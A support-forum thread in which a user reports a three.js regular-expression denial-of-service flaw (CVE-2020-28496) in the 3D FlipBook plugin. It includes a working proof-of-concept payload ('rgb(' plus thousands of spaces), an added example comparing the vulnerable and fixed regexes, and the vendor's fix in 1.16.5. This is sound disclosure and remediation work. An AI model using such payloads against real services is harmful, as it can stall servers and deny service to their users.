3D FlipBook - The three.js version currently used by 3D FlipBook has a vulnerability

y***n@mail.nptu.edu.tw
2024-09-02
2024-09-05

I scanned my WordPress site using Acunetix and it shows the three.js version currently used by 3D FlipBook has a vulnerability.

The detailed scan report is as follows:

This affects the package three before 0.125.0. This can happen when handling rgb or hsl colors. PoC:

var three = require('three');

// Build "rgb(" followed by n spaces and no closing ")", so the colour-string
// regex in Color.setStyle() never finds the ")" it expects and backtracks
// through every split of the run of spaces.
function build_blank(n) {
    var ret = "rgb(";
    for (var i = 0; i < n; i++) {
        ret += " ";
    }
    return ret;
}

var Color = three.Color;
var time = Date.now();
new Color(build_blank(50000));   // the string constructor path calls setStyle()
var time_cost = Date.now() - time;
console.log(time_cost + " ms");

References: CVE-2020-28496 (https://nvd.nist.gov/vuln/detail/CVE-2020-28496), CVE-2020-28496 (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-28496)
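The scan report above says little beyond "rgb or hsl colors", so the following added example (not code from the original post, from three.js or from 3D FlipBook) isolates the part that matters: the colour-prefix regex that runs on the PoC payload. The two patterns are reconstructed from memory of three.js Color.setStyle() before and after 0.125.0 and are an assumption to verify against the actual source you ship; the MAX_STYLE_LENGTH guard and all function names are this example's own. It times both patterns on the PoC input at two sizes so the quadratic growth of the vulnerable one is visible, and shows a length cap that an application can apply while it is still on an unpatched build.

```javascript
// Added example, not from the original post or from three.js / 3D FlipBook.
// ASSUMPTION: both regexes are reconstructions of the prefix check in
// three.js Color.setStyle() before and after 0.125.0; check the real source.

// Pre-0.125.0 shape. "\s*" followed by "[^\)]*" can split a run of n spaces in
// n+1 ways, and when the closing ")" never arrives the engine tries every
// split before giving up: O(n^2) work for an input of length n.
const VULNERABLE_PREFIX = /^((?:rgb|hsl)a?)\(\s*([^\)]*)\)/;

// Fixed shape. A single "[^\)]*" consumes the run once; with no ")" to find
// there is no alternative split to retry, so a non-match fails in O(n).
const FIXED_PREFIX = /^((?:rgb|hsl)a?)\(([^\)]*)\)/;

// Same payload as the PoC: "rgb(" plus n spaces and no closing ")".
function buildBlank(n) {
  return 'rgb(' + ' '.repeat(n);
}

// Apply one prefix regex; returns { model, body } on a match, else null.
function matchPrefix(re, style) {
  const m = re.exec(style);
  return m ? { model: m[1], body: m[2].trim() } : null;
}

// Time one regex on one input; returns { result, ms }.
function timeMatch(re, style) {
  const t0 = process.hrtime.bigint();
  const result = matchPrefix(re, style);
  const ms = Number(process.hrtime.bigint() - t0) / 1e6;
  return { result, ms };
}

// Application-side stopgap for an unpatched build: a legitimate CSS colour
// string is short, so refuse long ones before any regex sees them.
// ASSUMPTION: 64 characters is generous for "rgba(255, 255, 255, 0.5)".
const MAX_STYLE_LENGTH = 64;
function guardedMatch(re, style) {
  if (typeof style !== 'string' || style.length > MAX_STYLE_LENGTH) return null;
  return matchPrefix(re, style);
}

// Stand-alone demo: doubling n roughly quadruples the vulnerable time,
// while the fixed pattern stays near zero and returns the same null.
for (const n of [5000, 10000]) {
  const blank = buildBlank(n);
  for (const [name, re] of [['vulnerable', VULNERABLE_PREFIX], ['fixed', FIXED_PREFIX]]) {
    const { result, ms } = timeMatch(re, blank);
    console.log(`${name}: n=${n}, match=${JSON.stringify(result)}, ${ms.toFixed(1)} ms`);
  }
}
console.log('fixed on valid input:', JSON.stringify(matchPrefix(FIXED_PREFIX, 'rgba( 12, 34, 56, 0.5 )')));
```

Both patterns accept the same well-formed strings (the fixed one simply leaves leading whitespace for the later per-component parsing to trim), so the upgrade is behaviour-preserving for valid input; only the failure path changes. The length guard is not a substitute for upgrading: it blocks this payload, but the quadratic regex is still in the bundle.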

Replies

a***r@3dflipbook.net
2024-09-03
2024-09-03

Thank you for your report, we are already working on this issue.

a***r@3dflipbook.net
2024-09-05
2024-09-05

Fixed in 1.16.5; please let me know if Acunetix says something else.

y***n@mail.nptu.edu.tw
2024-10-06
2024-10-06

After updating to version 1.16.5 or later, the Acunetix scan showed it as fixed.